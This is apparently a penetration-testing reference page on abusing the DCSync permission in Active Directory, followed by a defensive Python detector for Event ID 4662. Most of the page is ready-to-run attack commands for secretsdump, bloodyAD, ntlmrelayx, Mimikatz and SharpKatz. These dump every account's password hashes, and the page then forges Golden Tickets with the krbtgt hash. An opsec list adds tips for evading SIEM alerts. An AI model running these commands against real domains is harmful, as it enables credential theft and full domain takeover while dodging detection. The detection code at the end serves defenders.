DCSync

The source principal holds both GetChanges and GetChangesAll on the domain object, so it can request replication of every account's password hashes from a domain controller without being one.

Applies to: User/Group/Computer → Domain

Note: DCSync requires BOTH GetChanges AND GetChangesAll on the Domain object. This edge appears in BloodHound when both conditions are already met.

Linux Abuse

impacket — secretsdump (primary method)

# Password auth
secretsdump.py -outputfile 'dcsync' -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>'

# Pass-the-Hash
secretsdump.py -outputfile 'dcsync' -hashes ':<ntlm-hash>' -dc-ip <dc-ip> '<domain>/<username>@<dc-ip>'

# Pass-the-Ticket (Kerberos)
KRB5CCNAME=<ccache> secretsdump.py -k -no-pass -outputfile 'dcsync' -dc-ip <dc-ip> '<domain>/<username>@<dc-hostname>'

# Single user only
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-user <target-user>

# NTLM only (faster, no Kerberos keys)
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-ntlm

Output files from secretsdump

dcsync.ntds         — LM:NT hashes for all users
dcsync.cleartext    — reversibly encrypted plaintext passwords
dcsync.kerberos     — DES, AES128, AES256 Kerberos keys

bloodyAD

bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get dcSync
bloodyAD -u <username> -H '<ntlm-hash>' -d <domain> --host <dc-ip> get dcSync --user <target-user>

NTLM relay → DCSync (if NTLM relay position available)

ntlmrelayx.py -t dcsync://<dc-hostname>
ntlmrelayx.py -t dcsync://<dc-hostname> -auth-smb '<domain>/<low-priv-user>:<password>'

Windows Abuse

Mimikatz

mimikatz # lsadump::dcsync /domain:<domain> /user:Administrator
mimikatz # lsadump::dcsync /domain:<domain> /user:krbtgt
mimikatz # lsadump::dcsync /domain:<domain> /all /csv

Invoke-Mimikatz (PowerShell)

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain> /user:Administrator"'
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain> /user:krbtgt"'

SharpKatz

.\SharpKatz.exe --Command dcsync --User Administrator --Domain <domain> --DomainController <dc-hostname>

After DCSync — using krbtgt hash for Golden Ticket

# Linux: ticketer.py
ticketer.py -nthash '<krbtgt-ntlm-hash>' -domain-sid '<domain-sid>' -domain '<domain>' 'fakeuser'
export KRB5CCNAME=fakeuser.ccache
# Windows: Mimikatz Golden Ticket
mimikatz # kerberos::golden /user:Administrator /domain:<domain> /sid:<domain-sid> /krbtgt:<krbtgt-ntlm-hash> /ptt

Opsec

  • DCSync generates Event ID 4662 on DC with ObjectType GUID for DS-Replication-Get-Changes — monitored by most SIEMs
  • Impacket uses SMB/DRSR over port 445 — monitor for non-DC systems issuing replication RPCs
  • Request only specific users (/user:krbtgt) to limit volume of 4662 events
  • Use Kerberos (-k) instead of NTLM for secretsdump to reduce credential-based alerts
  • ExtraSids attack (cross-domain trust escalation): add target domain's Enterprise Admins SID to forged ticket
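Detection-side counterpart to the Opsec notes above, added here as an example and not taken from the page or from any tool it names: it scans constructed 4662 records for the DS-Replication-Get-Changes / Get-Changes-All rights GUIDs being exercised by anything other than an allow-listed DC computer account. The GUID constants are the well-known AD schema values; the DC01$/DC02$ allow-list and the flattened key=value log format are assumptions for the example.

```python
import re
from collections import defaultdict

# Extended-rights GUIDs that DCSync needs on the domain object (well-known AD
# schema values, assumed here; check them against your own schema if in doubt)
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {GET_CHANGES, GET_CHANGES_ALL}

# Hypothetical allow-list: DC computer accounts replicate with each other legitimately
DC_ACCOUNTS = {"DC01$", "DC02$"}

# Constructed sample events, flattened to key=value pairs for the example
SAMPLE_4662 = [
    "EventID=4662 SubjectUserName=DC02$ ObjectType=domainDNS AccessMask=0x100 "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=jdoe ObjectType=domainDNS AccessMask=0x100 "
    "Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # non-replication access: placeholder GUID, must not fire
    "EventID=4662 SubjectUserName=jdoe ObjectType=user AccessMask=0x10 "
    "Properties={aaaaaaaa-0000-0000-0000-000000000000}",
    "EventID=4624 SubjectUserName=jdoe LogonType=3",
]

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}")


def parse_event(line):
    """Split a flattened record into a dict; Properties keeps its raw GUID list."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)


def replication_guids(event):
    """Return the replication-right GUIDs present in a 4662 Properties field."""
    if event.get("EventID") != "4662":
        return set()
    return set(GUID_RE.findall(event.get("Properties", ""))) & REPLICATION_GUIDS


def find_dcsync(lines, dc_accounts=DC_ACCOUNTS):
    """Map each non-DC principal to the replication rights it exercised.

    A single 4662 carrying Get-Changes-All from a non-DC account is enough to
    alert: restricting the request to one user (e.g. krbtgt) lowers the event
    volume but does not remove this signal.
    """
    hits = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        guids = replication_guids(ev)
        if guids and ev.get("SubjectUserName") not in dc_accounts:
            hits[ev["SubjectUserName"]] |= guids
    return dict(hits)
```

Feed it real 4662 records by mapping the EventData fields (SubjectUserName, Properties) into the same key=value shape, and keep the DC allow-list in sync with the Domain Controllers OU.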